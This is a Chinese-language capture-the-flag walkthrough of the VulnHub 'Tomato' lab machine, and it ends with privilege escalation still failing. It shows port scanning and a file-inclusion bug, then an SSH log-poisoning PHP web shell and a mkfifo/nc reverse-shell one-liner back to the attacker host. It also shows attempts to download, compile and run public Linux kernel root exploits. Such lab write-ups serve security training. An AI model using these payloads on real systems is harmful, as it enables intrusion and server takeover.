靶机地址:https://www.vulnhub.com/entry/tomato-1,557/
目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
一、信息收集
用 arp-scan 探测网段内目标靶机的 IP,得到目标靶机的IP为 192.168.11.137
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 00:50:56:f3:b5:59 VMware, Inc.
192.168.11.137 00:0c:29:29:d9:2e VMware, Inc.
192.168.11.254 00:50:56:e2:c4:a9 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded
使用masscan扫描开放的端口,发现开放 8888、80、2211、21 四个端口
masscan -p0-65535 192.168.11.137
┌──(root㉿kali)-[~]
└─# masscan -p0-65535 192.168.11.137
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-04-17 12:22:07 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8888/tcp on 192.168.11.137
Discovered open port 80/tcp on 192.168.11.137
Discovered open port 2211/tcp on 192.168.11.137
Discovered open port 21/tcp on 192.168.11.137
使用 nmap 扫描开放端口的服务
nmap -sV -p8888,80,2211,21 192.168.11.137
┌──(root㉿kali)-[~]
└─# nmap -sV -p8888,80,2211,21 192.168.11.137
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 14:43 CST
Nmap scan report for 192.168.11.137
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
8888/tcp open http nginx 1.10.3 (Ubuntu)
MAC Address: 00:0C:29:29:D9:2E (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.49 seconds
使用 dirb 扫描一下开放的 80 端口
┌──(root㉿kali)-[~]
└─# dirb http://192.168.11.137/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 18 14:30:12 2023
URL_BASE: http://192.168.11.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.11.137/ ----
==> DIRECTORY: http://192.168.11.137/antibot_image/
+ http://192.168.11.137/index.html (CODE:200|SIZE:652)
+ http://192.168.11.137/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.11.137/antibot_image/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Apr 18 14:30:14 2023
DOWNLOADED: 4612 - FOUND: 2
二、漏洞挖掘
访问http://192.168.11.137/antibot_image/发现存在目录 antibots
访问 antibots 目录后发现存在很多文件
访问http://192.168.11.137/antibot_image/antibots/info.php后F12查看源码发现存在文件包含漏洞
http://192.168.11.137/antibot_image/antibots/info.php?image=/etc/passwd
三、GetShell
信息搜集时发现 2211 端口服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件。
查看日志文件是否在默认路径
http://192.168.11.137/antibot_image/antibots/info.php?image=/var/log/auth.log
利用 ssh 连接,写入一句话木马
ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211
┌──(root㉿kali)-[~]
└─# ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211
The authenticity of host '[192.168.11.137]:2211 ([192.168.11.137]:2211)' can't be established.
ED25519 key fingerprint is SHA256:99Mk+oWitdg2e434cvlhvYgeQaMwRs76tgSLrezh9/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.11.137]:2211' (ED25519) to the list of known hosts.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
<?php system($_GET[cmd]);?>@192.168.11.137: Permission denied (publickey,password).
Kali端监听
nc -lvnp 5868
┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
使用Burp Suite反弹SHELL(快捷键Ctrl+U编码)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.131 5868 >/tmp/f
升级Full TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
ls
export SHELL=/bin/bash
export TERM=screen
stty rows 33 columns 145
reset
┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.137] 39958
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/antibot_image/antibots$ ^Z
[1]+ 已停止 nc -lvnp 5868
┌──(root㉿kali)-[~]
└─# stty raw -echo
┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
ls
antibot.php functions language screenshot-1.jpg settings
assets guide license.txt screenshot-2.jpg table
dashboard info.php readme.txt screenshot-3.jpg uninstall.php
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export SHELL=/bin/bash
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export TERM=screen
www-data@ubuntu:/var/www/html/antibot_image/antibots$ stty rows 33 columns 145
www-data@ubuntu:/var/www/html/antibot_image/antibots$ reset
四、提权---失败
查看 linux 内核版本
uname -a
www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
1、虚假的提权
寻找可利用的 EXP
searchsploit 4.4.0-21
利用 44300.c 提权
┌──(root㉿kali)-[~]
└─# locate linux_x86-64/local/44300.c
/usr/share/exploitdb/exploits/linux_x86-64/local/44300.c
┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux_x86-64/local/44300.c tomato
┌──(root㉿kali)-[~]
└─# ls -al tomato |grep 44300.c
-rw-r--r-- 1 root root 5959 4月18日 15:29 44300.c
查看POC
cat 44300.c
┌──(root㉿kali)-[~/tomato]
└─# cat 44300.c
/**
EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
Video ~ https://www.youtube.com/watch?v=qchiJn94kTo
**/
/** decr.c **/
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
Kali下载编译EXP
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
unzip 44300.zip
gcc decr.c -m32 -O2 -o decr
gcc pwn.c -O2 -o pwn
┌──(root㉿kali)-[~/tomato]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
--2023-04-18 15:45:10-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2575 (2.5K) [application/octet-stream]
正在保存至: “44300.zip”
44300.zip 100%[===================================================================>] 2.51K --.-KB/s 用时 0.01s
2023-04-18 15:45:13 (255 KB/s) - 已保存 “44300.zip” [2575/2575])
┌──(root㉿kali)-[~/tomato]
└─# unzip 44300.zip
Archive: 44300.zip
inflating: pwn.c
inflating: decr.c
┌──(root㉿kali)-[~/tomato]
└─# gcc decr.c -m32 -O2 -o decr
┌──(root㉿kali)-[~/tomato]
└─# gcc pwn.c -O2 -o pwn
┌──(root㉿kali)-[~/tomato]
└─# ls -al
总计 68
drwxr-xr-x 2 root root 4096 4月18日 15:51 .
drwx------ 33 root root 4096 4月18日 15:38 ..
-rw-r--r-- 1 root root 5959 4月18日 15:29 44300.c
-rw-r--r-- 1 root root 2575 4月18日 15:45 44300.zip
-rwxr-xr-x 1 root root 15572 4月18日 15:50 decr
-rw-r--r-- 1 root root 4565 2016年 4月23日 decr.c
-rwxr-xr-x 1 root root 16440 4月18日 15:51 pwn
-rw-rw-r-- 1 root root 1163 2016年 4月23日 pwn.c
Kali 端启开启 http 服务
python3 -m http.server 8000
┌──(root㉿kali)-[~/tomato]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
靶机下载EXP并赋权
wget http://192.168.11.131:8000/decr
wget http://192.168.11.131:8000/pwn
chmod 777 decr pwn
www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/decr
--2023-04-18 00:53:59-- http://192.168.11.131:8000/decr
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15572 (15K) [application/octet-stream]
Saving to: 'decr'
decr 100%[===================================================================>] 15.21K --.-KB/s in 0s
2023-04-18 00:53:59 (586 MB/s) - 'decr' saved [15572/15572]
www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/pwn
--2023-04-18 00:54:09-- http://192.168.11.131:8000/pwn
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16440 (16K) [application/octet-stream]
Saving to: 'pwn'
pwn 100%[===================================================================>] 16.05K --.-KB/s in 0.001s
2023-04-18 00:54:09 (12.9 MB/s) - 'pwn' saved [16440/16440]
www-data@ubuntu:/tmp$ ls -al |grep www-data
-rw-r--r-- 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data 0 Apr 18 00:54 f
-rw-r--r-- 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$ chmod 777 decr pwn
www-data@ubuntu:/tmp$ ls -al |grep www-data
-rwxrwxrwx 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data 0 Apr 18 00:54 f
-rwxrwxrwx 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$
执行EXP提权,提权失败
./decr
./pwn
www-data@ubuntu:/tmp$ ./decr
bash: ./decr: No such file or directory
注:网传将exp编译为64位版本即可提权
gcc decr.c -m64 -O2 -o decr
gcc pwn.c -m64 -O2 -o pwn
2、网传真实的提权(虚假)
GitHub查询到CVE-2017-6074版本的EXP可利用
Kali下载EXP并编译
git clone https://github.com/kkamagui/linux-kernel-exploits.git
cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/
┌──(root㉿kali)-[~/tomato]
└─# git clone https://github.com/kkamagui/linux-kernel-exploits.git
正克隆到 'linux-kernel-exploits'...
remote: Enumerating objects: 39, done.
remote: Total 39 (delta 0), reused 0 (delta 0), pack-reused 39
接收对象中: 100% (39/39), 37.83 KiB | 27.00 KiB/s, 完成.
处理 delta 中: 100% (3/3), 完成.
┌──(root㉿kali)-[~/tomato]
└─# cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 32
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root 37 4月18日 16:08 compile.sh
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ./compile.sh
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 56
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root 37 4月18日 16:08 compile.sh
-rwxr-xr-x 1 root root 23096 4月18日 16:39 CVE-2017-6074
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c
开启 http 服务
python3 -m http.server 8000
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# pwd
/root/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
靶机接收EXP并赋权
wget http://192.168.11.131:8000/CVE-2017-6074
chmod 777 CVE-2017-6074
www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/CVE-2017-6074
--2023-04-18 01:42:07-- http://192.168.11.131:8000/CVE-2017-6074
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23096 (23K) [application/octet-stream]
Saving to: 'CVE-2017-6074'
CVE-2017-6074 100%[===================================================================>] 22.55K --.-KB/s in 0s
2023-04-18 01:42:07 (877 MB/s) - 'CVE-2017-6074' saved [23096/23096]
www-data@ubuntu:/tmp$ ls -al |grep CVE-2017-6074
-rw-r--r-- 1 www-data www-data 23096 Apr 18 01:39 CVE-2017-6074
www-data@ubuntu:/tmp$ chmod 777 CVE-2017-6074
执行EXP提权
./CVE-2017-6074
www-data@ubuntu:/tmp$ ./CVE-2017-6074
./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./CVE-2017-6074)
3、GLIBC版本解决
-
查看靶场GLIBC版本
ldd --version
-
配置all in one环境
-
下载glibc-all-in-one
git clone https://github.com/matrix1001/glibc-all-in-one.git
-
更新列表
cd glibc-all-in-one/
python3 update_list
-
查看可安装版本
cat old_list # 注意下载文件(cat list)
-
-
安装配置patchelf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh
./configure
make
make check
make install
-
下载配置特定版本glibc
-
查看可用版本
cat old_list # 注意文件版本(cat list)
-
下载64位2.34版本GLIBC
./download_old 2.34-0ubuntu3_amd64 # 注意下载脚本是否为old版(./download)
-
-
编译(核心精华),以下两种方式均可
注:
-
GLIBC地址需要绝对路径
-
-Wl,--rpath指定ld-linux-x86-64.so.2文件所在目录
-
-Wl,--dynamic-linker指定ld-linux-x86-64.so.2文件
-
gcc -Wl,--rpath=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ -Wl,--dynamic-linker=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so.2 -s CVE-2017-6074.c -o exp
-
gcc -Wl,-rpath='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/',-dynamic-linker='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so' -s CVE-2017-6074.c -o exp
-Wl,--rpath=[GLIBC版本对应的ld-linux-x86-64.so.2所在目录] # 绝对路径
-Wl,--dynamic-linker=[GLIBC版本对应的ld-linux-x86-64.so.2文件] # 绝对路径
-s:指定要编译的文件,选项可省略
-o:指定编译后文件名,选项及参数均可省略
-
提权一直失败,就很神奇